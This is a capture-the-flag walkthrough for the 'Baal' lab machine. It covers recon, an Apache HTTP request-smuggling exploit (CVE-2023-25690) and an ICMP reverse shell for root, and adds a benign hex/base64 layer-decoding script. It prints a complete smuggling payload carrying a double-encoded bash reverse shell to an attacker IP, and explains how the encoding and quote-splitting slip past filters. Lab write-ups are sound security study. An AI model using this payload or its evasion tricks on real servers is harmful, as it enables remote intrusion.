# Lab setup

Download: Baal

NAT, IP: 192.168.1.156

# Exploitation

# Initial recon

```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 3a:dc:d6:1d:84:b6:96:c0:8f:96:1e:65:a0:24:0e:fb (ECDSA)
|_  256 de:93:17:fb:3a:19:9c:e0:17:32:2d:a9:73:f7:c5:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.55 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.55 (Unix)
```
```text
┌──(root㉿kali)-[~]
└─# dirb http://192.168.1.156
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 27 22:00:22 2024
URL_BASE: http://192.168.1.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.156/ ----
+ http://192.168.1.156/index.html (CODE:200|SIZE:45)
==> DIRECTORY: http://192.168.1.156/mod/

---- Entering directory: http://192.168.1.156/mod/ ----
+ http://192.168.1.156/mod/.git/HEAD (CODE:200|SIZE:151)
+ http://192.168.1.156/mod/.svn/entries (CODE:200|SIZE:151)
+ http://192.168.1.156/mod/_vti_bin/_vti_adm/admin.dll (CODE:200|SIZE:164)
+ http://192.168.1.156/mod/_vti_bin/_vti_aut/author.dll (CODE:200|SIZE:164)
+ http://192.168.1.156/mod/_vti_bin/shtml.dll (CODE:200|SIZE:155)
+ http://192.168.1.156/mod/cgi-bin/ (CODE:200|SIZE:154)
+ http://192.168.1.156/mod/CVS/Entries (CODE:200|SIZE:150)
+ http://192.168.1.156/mod/CVS/Repository (CODE:200|SIZE:150)
+ http://192.168.1.156/mod/CVS/Root (CODE:200|SIZE:150)
+ http://192.168.1.156/mod/index.html (CODE:200|SIZE:95)

-----------------
END_TIME: Mon May 27 22:00:31 2024
DOWNLOADED: 9224 - FOUND: 11
```

This is HTTP request smuggling: CVE-2023-25690 (Apache httpd 2.4.0 through 2.4.55, mod_proxy combined with a RewriteRule or ProxyPassMatch that substitutes part of the request URL into the proxied request-target). The banner above is 2.4.55, and every path dirb tried under /mod/ answers 200 with a near-identical body size, which looks like a catch-all rewrite into a backend rather than real files.

Because mod_rewrite decodes the captured path before substituting it, CRLF injection can terminate the proxied request and supply our own Host header. Following the hint, the Host is baal.vulnyx and the URI is proxy.php?ping=127.0.0.1, with an RCE payload appended to the ping parameter.

Replace the first line of the HTTP request with the following payload:

```http
GET /mod/test/%20HTTP/1.1%0D%0AHost:%20baal.vulnyx%0D%0A%0D%0AGET%20/proxy.php%3Fping%3D127.0.0.1/%3Becho%24%7BIFS%7DWW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpFdU1USTVMelEwTkRRZ01ENG1NUT09%7Cba''se''6''4%24%7BIFS%7D-''d%7Cba''se''64%24%7BIFS%7D-''d%7Cb''a''s''h%3B/ HTTP/1.1
```

The base64 blob in the middle is `bash -i >& /dev/tcp/192.168.1.129/4444 0>&1` encoded twice. A single layer did not work, probably because it contains a `+`, which a query-string parser decodes as a space; the second layer is purely alphanumeric. `${IFS}` stands in for spaces, which would otherwise terminate the request URI, and the `ba''se''6''4` / `b''a''s''h` quote splitting keeps the literal tool names out of the request while the shell discards the empty strings.

Got a shell.

# Privilege escalation

The web root contains `.id_rsa_hammon`; grab it and SSH in with it.

`sudo -l` shows `/root/pingto.sh`, but there is no way to turn it into code execution directly.

Monitoring processes with pspy, it appears to go over the ens33 interface, whereas mine is eth0, so that still needs configuring.

Looked at a writeup: it says that when pingto is run and an IP is entered, it executes a command and gives the hint 34393433346435303634366636663732.

```text
┌──(root㉿kali)-[~]
└─# echo '34393433346435303634366636663732' | xxd -r -p | xxd -r -p
ICMPdoor
```
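Added example, not from the original writeup: the two-pass xxd above is one instance of peeling stacked encodings. This script generalizes it to hex or base64 layers of any depth, stopping at the first result that is printable data rather than another encoding, and the same loop also undoes the double base64 used in the smuggling payload earlier on this page. The names `peel_layers` and `final_plaintext` are mine.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable)


def _try_hex(s: str):
    try:
        return bytes.fromhex(s)
    except ValueError:
        return None


def _try_base64(s: str):
    try:
        return base64.b64decode(s, validate=True)  # reject non-alphabet chars
    except (binascii.Error, ValueError):
        return None


def peel_layers(blob: str, max_depth: int = 8) -> list:
    """Strip hex or base64 layers one at a time, returning every intermediate text.

    A layer is only accepted when it decodes to printable ASCII, so the loop
    stops at the first result that is data rather than another encoding
    (for example 'ICMPdoor' is syntactically valid base64 but decodes to
    control bytes, so it is kept as the final answer).  Hex is tried before
    base64 because a hex string is made of base64-alphabet characters and may
    decode as base64 too.
    """
    layers = []
    current = blob.strip()
    for _ in range(max_depth):
        decoded = _try_hex(current)
        if decoded is None:
            decoded = _try_base64(current)
        if decoded is None:
            break
        try:
            text = decoded.decode("ascii")
        except UnicodeDecodeError:
            break
        if not set(text) <= PRINTABLE:
            break
        layers.append(text)
        current = text
    return layers


def final_plaintext(blob: str) -> str:
    """The innermost layer, or the input itself if nothing could be peeled."""
    layers = peel_layers(blob)
    return layers[-1] if layers else blob


if __name__ == "__main__":
    # The hint from this box: two hex layers.
    for step in peel_layers("34393433346435303634366636663732"):
        print(step)
```

The printable-ASCII check is what makes the loop safe to run blindly on CTF hints: without it, a short word such as the final `ICMPdoor` would be "decoded" one step too far into garbage.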

ICMPdoor is a reverse shell over ICMP; connect to it directly with the C2 side (the cnc) of that project: icmpdoor.

Got a root shell.